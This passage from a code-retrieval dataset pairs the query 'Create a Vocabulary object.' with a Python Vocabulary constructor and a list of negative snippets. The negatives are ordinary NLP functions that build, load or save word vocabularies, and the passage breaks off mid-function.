or '',\n 'employee_id': slip.employee_id.id,\n 'bysal': payslip_line.total\n })\n slip.advice_id = advice.id" ]
[ "0.5009308", "0.50050104", "0.47927547", "0.47090858", "0.4646092", "0.46367276", "0.4600246", "0.45939845", "0.4547362", "0.45332745", "0.45131713", "0.45066488", "0.44925582", "0.44843617", "0.44840214", "0.4477567", "0.4472213", "0.44629148", "0.4452782", "0.4435036", "0.44328246", "0.44308645", "0.44265833", "0.4421612", "0.44146124", "0.4413403", "0.4410658", "0.44066277", "0.4400675", "0.43965662", "0.43781736", "0.43699896", "0.43698013", "0.43590617", "0.43502194", "0.4350029", "0.43460575", "0.43427908", "0.4332767", "0.4331764", "0.43228325", "0.4321928", "0.43122923", "0.43089813", "0.43023753", "0.4300798", "0.43000132", "0.4298905", "0.42902955", "0.42810413", "0.4279823", "0.42770475", "0.42768544", "0.4275416", "0.4269213", "0.42691246", "0.42684186", "0.42681015", "0.4267813", "0.4267813", "0.42658833", "0.42568272", "0.4253994", "0.4251924", "0.42514658", "0.42436707", "0.42415765", "0.42327845", "0.42259216", "0.42256454", "0.42240167", "0.42184362", "0.42133504", "0.42113551", "0.42102885", "0.4208856", "0.41949108", "0.41949108", "0.41930157", "0.41922373", "0.41910413", "0.41871935", "0.41834024", "0.41822806", "0.4178193", "0.4178075", "0.41760555", "0.41748223", "0.41744244", "0.4172829", "0.41689974", "0.41668284", "0.41653827", "0.41613853", "0.4157697", "0.41568294", "0.41426092", "0.41405603", "0.41349748", "0.4133247" ]
0.5701247
0
Create a Vocabulary object.
def __init__(self, max_size=None, lower=True, unk_token=True, remove_stopwords=False, specials=('<pad>',)): self._max_size = max_size self._lower = lower self._unk = unk_token self.token2id = {token: i for i, token in enumerate(specials)} self._id2token = list(specials) self._token_count = Counter() self.can_remove_stopwords=remove_stopwords self.num_docs = 0 self.num_pos = 0 self.num_nnz = 0 self.corpus=None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vocab():\n symbols = DEFAULT_SPECIAL_SYMBOLS + [\"mouse\", \"dog\", \"tree\"]\n return Vocabulary(symbols)", "def from_dict(cls, dikt: dict) -> 'Vocabulary':\n return util.deserialize_model(dikt, cls)", "def create_vocab(vocab_path='ORBvoc-synth.txt'):\n total_time = 10 # seconds\n num_frames = 20\n speed = 3.0\n vocab_builder = VocabularyBuilder()\n for seed in tqdm(range(100), total=100):\n image_builder = DemoImageBuilder(\n mode=ImageMode.MONOCULAR, seed=seed,\n length=total_time * speed\n )\n for idx in range(num_frames):\n time = total_time * idx / num_frames\n image = image_builder.create_frame(time)\n vocab_builder.add_image(image.pixels)\n vocab_builder.build_vocabulary(str(vocab_path))", "def create(self, vocabulary=list) -> dict:\n try:\n out = {}\n for i in range(len(vocabulary)):\n out[vocabulary[i]] = i\n return(out)\n except Exception as error:\n print(f\"Error: self.create([...]) -> {error}\")", "def create_vocab(\n self,\n instance_datasets: Iterable[InstanceDataset],\n config: Optional[VocabularyConfiguration] = None,\n ) -> Vocabulary:\n # The transformers feature comes with its own vocab, no need to create anything if it is the only feature\n if self.config.features.configured_namespaces == [\n TransformersFeatures.namespace\n ]:\n return self.vocab\n\n self._check_for_word_vector_weights_file()\n\n config = config or VocabularyConfiguration()\n\n vocab = Vocabulary.from_instances(\n instances=(\n instance for dataset in instance_datasets for instance in dataset\n ),\n max_vocab_size=config.max_vocab_size,\n min_count=config.min_count,\n pretrained_files=config.pretrained_files,\n only_include_pretrained_words=config.only_include_pretrained_words,\n min_pretrained_embeddings=config.min_pretrained_embeddings,\n tokens_to_add=config.tokens_to_add,\n )\n\n # If the vocab is the same, this is just a no-op\n self._model.extend_vocabulary(vocab)\n\n return vocab", "def create_vocabulary(vocabulary_path, json_vocab_path):\n if not gfile.Exists(vocabulary_path):\n print(\"Transform vocabulary to %s\" % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode=\"rb\") as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")", "def make_vocab(corpus_dictionary, vocab_path):\n with open(vocab_path, 'wb') as fout:\n pickle.dump(corpus_dictionary, fout)\n print('Saved dictionary to', vocab_path)", "def load(cls, path: str) -> 'Vocab':\n with open(path, 'r', encoding='utf-8') as f:\n return cls.from_json(f.read())", "def vocabulary(self, config=Config()):\n raise NotImplementedError(\"Class %s doesn't implement vocabulary()\" % self.__class__.__name__)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise 
ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if os.path.exists(vocabulary_path):\n rev_vocab = []\n with codecs_open(vocabulary_path, \"rb\", encoding=\"utf-8\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [tf.compat.as_bytes(line.strip()) for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def __init__(self, vocabulary_size=1000):\n self.vocabulary_size = vocabulary_size", "def create_vocabulary(sentences, path):\n print('creating vocab..')\n\n word_dict = dict(); vocabulary = dict()\n for sentence in sentences:\n for word in nltk.word_tokenize(sentence):\n if word not in word_dict:\n word_dict[word] = ''\n word_dict['<s>'] = ''\n word_dict['</s>'] = ''\n\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word, vec = line.split(' ', 1)\n if word in word_dict:\n vocabulary[word] = np.fromstring(vec, sep=' ')\n\n print('vocabulary was created successfully!')\n return vocabulary", "def _create_vocab(captions):\n print(\"Creating vocabulary.\")\n min_word_count = 4\n word_counts_output_file = '/Users/lzg/Desktop/image_caption/word_count.txt'\n counter = Counter()\n for c in captions:\n counter.update(c)\n print(\"Total words:\", len(counter))\n\n # Filter uncommon words and sort by descending count.\n word_counts = [x for x in counter.items() if x[1] >= min_word_count]\n word_counts.sort(key=lambda x: x[1], reverse=True)\n print(\"Words in vocabulary:\", len(word_counts))\n\n # Write out the word counts file.\n with tf.gfile.FastGFile(word_counts_output_file, \"w\") as f:\n f.write(\"\\n\".join([\"%s %d\" % (w, c) for w, c in word_counts]))\n print(\"Wrote vocabulary file:\", word_counts_output_file)\n\n # Create the vocabulary dictionary.\n reverse_vocab = [x[0] for x in 
word_counts]\n unk_id = len(reverse_vocab)\n vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])\n # vocab = Vocabulary(vocab_dict, unk_id)\n\n return vocab_dict, unk_id", "def getVocabulary(self): # real signature unknown; restored from __doc__\n pass", "def load(cls, w2v_vocab):\n n2v_vocab = cls()\n for key, value in w2v_vocab.__dict__.items():\n setattr(n2v_vocab, key, value)\n return n2v_vocab", "def getVocabulary(vocabulary_id):\n relex_web = getSite().restrictedTraverse('relex_web')\n key = KEY_STORAGE + \".\" + vocabulary_id\n vocabulary = json.loads(getattr(relex_web, key, \"[]\"))\n return vocabulary", "def from_list(texts, max_size=None, min_freq=None, tokenizer=None):\n \n if tokenizer is None:\n tokenizer = Preprocess([\n Consecutive(),\n RemoveEmoji(),\n WordTokenizer()\n ])\n\n vocab = Vocabulary(\n max_size=max_size,\n min_freq=min_freq)\n\n token_lst = tokenizer(texts)\n vocab.build_vocab(token_lst)\n\n return vocab", "def create_vocab(input_iter, min_frequency):\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(\n FLAGS.max_sentence_len,\n min_frequency=min_frequency,\n tokenizer_fn=tokenizer_fn)\n\n vocab_processor.fit(input_iter)\n return vocab_processor", "def create_vocabulary(vocabulary_path, data_paths, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n vocab = {}\n files = []\n files += [data_paths+f for f in os.listdir(data_paths) ]\n for one_file in files:\n with gfile.GFile(one_file, mode=\"rb\") as f:\n review = f.read()\n tokens = tokenizer(review) if tokenizer else character_tokenizer(review)\n for w in tqdm(tokens):\n word = _DIGIT_RE.sub(b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n else:\n print(\"Vocabulary already created.\")", "def _load_vocab(vocab_file_name, language):\n vocab = []\n vocab_size = 0\n #with codecs.getreader(\"utf-8\")(tf.gfile.GFile(vocab_file_name), \"rb\") as f:\n with tf.gfile.GFile(vocab_file_name) as f:\n for word in f:\n vocab.append(word.strip())\n vocab_size += 1\n\n if not EOS in vocab:\n vocab = [EOS] + vocab\n if not SOS in vocab:\n vocab = [SOS] + vocab\n if not UNK in vocab:\n vocab = [UNK] + vocab\n\n reverse_dictionary = {}\n new_vocab_file_name = vocab_file_name + \".new\"\n with tf.gfile.GFile(new_vocab_file_name, \"wb\") as f:\n reverse_dictionary = {}\n i = 0\n for word in vocab:\n f.write(\"%s\\n\" % word)\n reverse_dictionary.update({i : word})\n i+=1\n\n vocab_table = tf.contrib.lookup.index_table_from_file(new_vocab_file_name, default_value = 0)\n\n eos_id_tensor = tf.cast(vocab_table.lookup(tf.constant(EOS)), tf.int32)\n sos_id_tensor = tf.cast(vocab_table.lookup(tf.constant(SOS)), tf.int32)\n\n return Vocab(lang=language,\n table=vocab_table,\n size=vocab_size,\n reverse_dict=reverse_dictionary,\n sos_id_tensor=sos_id_tensor,\n eos_id_tensor=eos_id_tensor)", "def load_vocab(fn):\n return corpora.Dictionary.load(fn)", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with 
gfile.GFile(data_path, mode=\"rb\") as f:\n counter = 0\n for line in f:\n counter += 1\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n print(\"vocab too big\")\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")", "def deserialize(self, descriptor: Dict, data: List) -> ObjectHandle:\n return VocabularyHandle(\n values=set(data),\n name=descriptor['name'],\n namespace=descriptor['namespace'],\n label=descriptor.get('label'),\n description=descriptor.get('description')\n )", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True,\n _DIGIT_RE=re.compile(br\"\\d\"),\n _START_VOCAB=[b\"_PAD\", b\"_GO\", b\"_EOS\", b\"_UNK\"]):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"rb\") as f:\n counter = 0\n for line in f:\n counter += 1\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n else:\n print(\"Vocabulary %s from data %s exists\" % (vocabulary_path, data_path))", "def create_restricted_vocabulary(field, options,\n message_factory=None,\n restricted=lambda x: True):\n class GeneratedVocabulary(object):\n\n @property\n def option_level_mapping(self):\n option_level_mapping = [list(a) for a in self.options[:]]\n option_level_mapping = dict([a for a in option_level_mapping\n if not a.reverse()])\n return option_level_mapping\n\n @property\n def option_names(self):\n return [a[1] for a in self.options]\n\n @property\n def options(self):\n if callable(self._options):\n return self._options()\n else:\n return self._options\n\n def __call__(self, context):\n self.context = context\n\n terms = []\n for name in self.get_allowed_option_names():\n title = name\n if message_factory:\n title = self._(name)\n terms.append(\n zope.schema.vocabulary.SimpleTerm(name, title=title))\n return zope.schema.vocabulary.SimpleVocabulary(terms)\n\n def get_allowed_option_names(self):\n acquisition_value = self._get_acquisiton_value()\n\n if not self.restricted():\n return self.option_names\n\n if not acquisition_value or acquisition_value not in self.option_names:\n return self.option_names\n\n allowed_option_names = []\n allowed_option_names.append(acquisition_value)\n allowed_level = self.option_level_mapping[acquisition_value] + 1\n for level, name in self.options:\n if level >= allowed_level:\n allowed_option_names.append(name)\n\n return allowed_option_names\n\n def _get_acquisiton_value(self):\n context = self.context\n if isinstance(context, MetadataBase) or 
context is None:\n # we do not test the factory, it is not acquisition wrapped and\n # we cant get the request...\n return None\n request = self.context.REQUEST\n # XXX CHANGED FROM PATH_TRANSLATED TO PATH_INFO\n # because the test don't work\n if '++add++' in request.get('PATH_INFO', ''):\n # object is not yet existing, context is container\n obj = context\n else:\n # object is existing, container is parent of context\n obj = context.aq_inner.aq_parent\n while not ISiteRoot.providedBy(obj):\n try:\n return self.field.get(obj)\n except AttributeError:\n try:\n interface_ = self.field.interface\n except AttributeError:\n pass\n else:\n try:\n adpt = interface_(obj)\n except TypeError:\n # could not adapt\n pass\n else:\n return self.field.get(adpt)\n obj = obj.aq_inner.aq_parent\n return self.field.default\n\n GeneratedVocabulary.field = field\n GeneratedVocabulary._options = options\n GeneratedVocabulary._ = message_factory\n GeneratedVocabulary.restricted = restricted\n\n return GeneratedVocabulary", "def create_vocabulary(vocabulary_path, words, max_vocabulary_size, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s with max size %d\" % (vocabulary_path, max_vocabulary_size))\n vocab = {}\n counter = 0\n for w in words:\n counter += 1\n if counter % 10000 == 0:\n print(\" processing word %d = %s\" % (counter, w))\n word = re.sub(_DIGIT_RE, \"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"w\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + \"\\n\")", "def initialize_vocabulary(vocabulary_path):\n characters_class = 9999\n\n if os.path.exists(vocabulary_path):\n with codecs.open(vocabulary_path, 'r', encoding='utf-8') as voc_file:\n rev_vocab = [line.strip() for line in voc_file]\n\n vocab = {x: y for (y, x) in enumerate(rev_vocab)}\n\n reserved_char_size = characters_class - len(rev_vocab)\n if reserved_char_size < 0:\n raise ValueError(\"Number of characters in vocabulary is equal or larger than config.characters_class\")\n\n for _ in range(reserved_char_size):\n rev_vocab.append('')\n\n # put space at the last position\n vocab[' '] = len(rev_vocab)\n rev_vocab.append(' ')\n return vocab, rev_vocab\n\n raise ValueError(\"Initializing vocabulary ends: %s\" % vocabulary_path)", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"r\") as f:\n counter = 0\n for line in f:\n counter += 1\n line = line.strip().split('\\t')[0]\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, \"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n sorted_vocab = sorted(vocab, key=vocab.get, reverse=True)\n vocab_list = _START_VOCAB + sorted_vocab\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), max_vocabulary_size, 
vocab[sorted_vocab[max_vocabulary_size - len(_START_VOCAB)]] ) )\n else:\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), len(vocab), 0))\n\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + \"\\n\")", "def build_vocab(self):\n if self.test_file is None:\n print('test_file is None')\n file_list = [self.train_file, self.dev_file]\n else:\n file_list = [self.train_file, self.dev_file, self.test_file]\n\n examples = []\n for file_name in file_list:\n examples += ParseExample.load_data(file_name)\n\n sents = []\n for example in examples:\n warrant0, warrant1, reason, claim, debate_meta_data, negclaim = example.get_six(type=WORD_TYPE)\n sents.append(warrant0)\n sents.append(warrant1)\n sents.append(reason)\n sents.append(claim)\n sents.append(debate_meta_data)\n\n vocab = data_utils.build_word_vocab(sents)\n\n return vocab", "def from_pickle(pkl):\n assert os.path.exists(pkl), f\"{pkl} not exists\"\n with open(pkl, 'rb') as f:\n vocab = pickle.load(f)\n \n return vocab", "def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)", "def __init__(self, file):\n with open(file, 'r') as f:\n self.vocab = json.loads(f.read())", "def vocab(self) -> Vocabulary:\n return self._model.vocab", "def initialize_vocabulary(self,vocabulary_path):\n if tf.gfile.Exists(vocabulary_path):\n vocab = corpora.Dictionary.load(vocabulary_path)\n print(\"vocab length: \",len(vocab.token2id))\n\n return vocab.token2id, vocab.token2id.keys()\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def create_vocab_table(db, vocab):\n con = lite.connect(db)\n with con:\n cur = con.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS Vocab(vocab TEXT)\")\n for i in range(0, len(vocab)):\n vocab[i] = (vocab[i],)\n with con:\n cur = con.cursor()\n cur.executemany(\"INSERT INTO Vocab VALUES (?)\", vocab)", "def load_vocab(path: str) -> Vocab:\n return torch.load(path, map_location=lambda storage, loc: storage)['args'].vocab", "def buildVocabulary(paragraphs, verbose=True):\n vocabulary = []\n \n for p in paragraphs:\n for word in p.split():\n vocabulary.append(word)\n\n vocabulary = set(vocabulary)\n if verbose:\n print('Built vocabulary of %d unique words'%len(vocabulary))\n \n return list(vocabulary)", "def load_vocab(self, fn):\n vocab = load_vocab(fn)\n self.vocab = vocab\n self.has_vocab = True", "def get_vocab(self):\n\n\t\tself.parse_transcript() \n\t\tself.purge_words()\n\t\tself.analyze_words()\n\t\tself.sort_word_analysis()", "def _build_vocabulary(input_files):\n if FLAGS.vocab_file:\n tf.logging.info(\"Loading existing vocab file.\")\n vocab = collections.OrderedDict()\n with tf.gfile.GFile(FLAGS.vocab_file, mode=\"r\") as f:\n for i, line in enumerate(f):\n word = line.decode(\"utf-8\").strip()\n assert word not in vocab, \"Attempting to add word twice: %s\" % word\n vocab[word] = i\n tf.logging.info(\"Read vocab of size %d from %s\",\n len(vocab), FLAGS.vocab_file)\n return vocab\n\n tf.logging.info(\"Creating vocabulary.\")\n num = 0\n wordcount = collections.Counter()\n for input_file in input_files:\n tf.logging.info(\"Processing file: %s\", input_file)\n for sentence in 
tf.gfile.FastGFile(input_file):\n wordcount.update(sentence.split())\n\n num += 1\n if num % 1000000 == 0:\n tf.logging.info(\"Processed %d sentences\", num)\n\n tf.logging.info(\"Processed %d sentences total\", num)\n\n words = wordcount.keys()\n freqs = wordcount.values()\n sorted_indices = np.argsort(freqs)[::-1]\n\n vocab = collections.OrderedDict()\n vocab[special_words.EOS] = special_words.EOS_ID\n vocab[special_words.UNK] = special_words.UNK_ID\n for w_id, w_index in enumerate(sorted_indices[0:FLAGS.num_words - 2]):\n vocab[words[w_index]] = w_id + 2 # 0: EOS, 1: UNK.\n\n tf.logging.info(\"Created vocab with %d words\", len(vocab))\n\n vocab_file = os.path.join(FLAGS.output_dir, \"vocab.txt\")\n with tf.gfile.FastGFile(vocab_file, \"w\") as f:\n f.write(\"\\n\".join(vocab.keys()))\n tf.logging.info(\"Wrote vocab file to %s\", vocab_file)\n\n word_counts_file = os.path.join(FLAGS.output_dir, \"word_counts.txt\")\n with tf.gfile.FastGFile(word_counts_file, \"w\") as f:\n for i in sorted_indices:\n f.write(\"%s %d\\n\" % (words[i], freqs[i]))\n tf.logging.info(\"Wrote word counts file to %s\", word_counts_file)\n\n return vocab", "def trackVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n tracks = ct.searchResults(portal_type='apyb.papers.track', sort_on='getObjPositionInParent')\n items = [SimpleTerm(b.UID,b.UID,b.Title) for b in tracks]\n return SimpleVocabulary(items)", "def build_vocabulary(self):\n \n for iCount in range(0,len(self.documents)):\n for jCount in range(iCount,len(self.documents[iCount])):\n self.vocabulary.append(self.documents[iCount][jCount])\n\n self.vocabulary = set(self.vocabulary)\n\t\t\n self.vocabulary = sorted(self.vocabulary)\n\t\t#print(\"Value of the vocabulary\")\n self.vocabulary_size = len(self.vocabulary)", "def build_vocab(sentences_list, vocab_size, visual_fld):\n words = [word for sentence in sentences_list for word in sentence]\n utils.safe_mkdir(visual_fld)\n with open(os.path.join(visual_fld, 'vocab.tsv'), 'w') as fd:\n dictionary = {}\n index_dictionary = {}\n count = [('UNK', -1)]\n count.extend(Counter(words).most_common(vocab_size - 1))\n for index, (word, _) in enumerate(count):\n dictionary[word] = index\n index_dictionary[index] = word\n fd.write(word + '\\n')\n\n return dictionary, index_dictionary", "def load_vocab():\n # vocab loaded internally at google\n unused = r.sp_model\n del unused\n return r", "def _make_vocab_files(self):\n self.logger.info('making question vocab...' + self.opt.QUESTION_VOCAB_SPACE)\n qdic, _ = self.load_data(self.opt.QUESTION_VOCAB_SPACE)\n question_vocab = VQADataProvider.make_question_vocab(qdic, self.max_length)\n self.logger.info('making answer vocab...' 
+ self.opt.ANSWER_VOCAB_SPACE)\n qdic, adic = self.load_data(self.opt.ANSWER_VOCAB_SPACE)\n answer_vocab = VQADataProvider.make_answer_vocab(adic, qdic, self.opt.MAX_ANSWER_VOCAB_SIZE, self.use_ocr)\n return question_vocab, answer_vocab", "def setVocabulary(self, vocabulary): # real signature unknown; restored from __doc__\n pass", "def create_vocabulary(\n data: Series,\n tokenizer_type: str = \"space\",\n lowercase: bool = True,\n num_most_frequent: int = None,\n vocab_file: str = None,\n add_special_symbols: bool = True,\n unknown_symbol: str = UNKNOWN_SYMBOL,\n padding_symbol: str = PADDING_SYMBOL,\n start_symbol: str = START_SYMBOL,\n stop_symbol: str = STOP_SYMBOL,\n pretrained_model_name_or_path: str = None,\n ngram_size: Optional[int] = None,\n compute_idf: bool = False,\n processor: DataFrameEngine = PANDAS,\n) -> Vocabulary:\n vocab = None\n\n tokenizer = get_tokenizer_from_registry(tokenizer_type)(\n vocab_file=vocab_file,\n pretrained_model_name_or_path=pretrained_model_name_or_path,\n ngram_size=ngram_size,\n )\n\n # Pre-trained huggingface tokenizer. Use the pre-existing vocabulary and special symbols.\n if tokenizer_type == \"hf_tokenizer\":\n try:\n vocab = tokenizer.get_vocab()\n vocab = list(vocab.keys())\n except NotImplementedError:\n logger.warning(\n \"HuggingFace tokenizer does not have a get_vocab() method. \"\n + \"Using tokenizer.tokenizer.vocab_size and tokenizer.tokenizer._convert_id_to_token \"\n + \"to build the vocabulary.\"\n )\n vocab = []\n for idx in range(tokenizer.tokenizer.vocab_size):\n vocab.append(tokenizer.tokenizer._convert_id_to_token(idx))\n vocab += tokenizer.tokenizer.added_tokens_encoder.keys()\n\n pad_token = tokenizer.get_pad_token()\n unk_token = tokenizer.get_unk_token()\n\n if unk_token is None:\n logger.warning(\n \"No unknown token found in HuggingFace tokenizer. Adding one. \"\n + \"NOTE: This will change the vocabulary size and may affect model \"\n + \"performance, particularly if the model weights are frozen.\"\n )\n vocab = [unknown_symbol] + vocab\n else:\n unknown_symbol = unk_token\n\n if pad_token is None and add_special_symbols:\n logger.warning(\n \"No padding token found in HuggingFace tokenizer. Adding one. \"\n + \"NOTE: This will change the vocabulary size and may affect model \"\n + \"performance, particularly if the model weights are frozen.\"\n )\n vocab = [padding_symbol] + vocab\n else:\n padding_symbol = pad_token\n elif hasattr(tokenizer, \"get_vocab\"):\n vocab = tokenizer.get_vocab()\n vocab = list(vocab.keys())\n elif vocab_file is not None:\n vocab = load_vocabulary(vocab_file)\n\n def process_line(line):\n return tokenizer(line.lower() if lowercase else line)\n\n processed_lines = processor.map_objects(data, process_line)\n processed_counts = processed_lines.explode().value_counts(sort=False)\n processed_counts = processor.compute(processed_counts)\n unit_counts = Counter(dict(processed_counts))\n\n doc_unit_counts = None\n if compute_idf:\n # The document frequency used for TF-IDF. 
Similar to unit_counts, but de-duped by document.\n document_counts = processed_lines.map(lambda x: set(x)).explode().value_counts(sort=False)\n document_counts = processor.compute(document_counts)\n doc_unit_counts = Counter(dict(document_counts))\n\n line_length_max = processor.compute(processed_lines.map(len).max())\n line_length_99ptile = processor.compute(processed_lines.map(len).quantile(0.99))\n\n if vocab is None:\n vocab = [unit for unit, _ in unit_counts.most_common(num_most_frequent)]\n\n vocab_set = set(vocab)\n\n if tokenizer_type != \"hf_tokenizer\":\n if add_special_symbols:\n add_or_move_symbol(vocab, vocab_set, stop_symbol, SpecialSymbol.STOP.value)\n add_or_move_symbol(vocab, vocab_set, start_symbol, SpecialSymbol.START.value)\n add_or_move_symbol(vocab, vocab_set, padding_symbol, SpecialSymbol.PADDING.value)\n # Always add the UNKNOWN symbol if we're using our own tokenizer.\n add_or_move_symbol(vocab, vocab_set, unknown_symbol, SpecialSymbol.UNKNOWN.value)\n\n str2idx = {unit: i for i, unit in enumerate(vocab)}\n str2freq = {unit: unit_counts.get(unit) if unit in unit_counts else 0 for unit in vocab}\n str2idf = (\n {unit: np.log(len(vocab) / (1 + doc_unit_counts.get(unit))) if unit in doc_unit_counts else 0 for unit in vocab}\n if compute_idf\n else None\n )\n\n pad_idx = None\n if padding_symbol in str2idx.keys():\n pad_idx = str2idx[padding_symbol]\n\n return Vocabulary(\n vocab=vocab,\n str2idx=str2idx,\n str2freq=str2freq,\n str2idf=str2idf,\n line_length_max=line_length_max,\n line_length_99ptile=line_length_99ptile,\n pad_idx=pad_idx,\n padding_symbol=padding_symbol,\n unknown_symbol=unknown_symbol,\n )", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences)) # 实际没用到\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # 加入 <UNK>\n 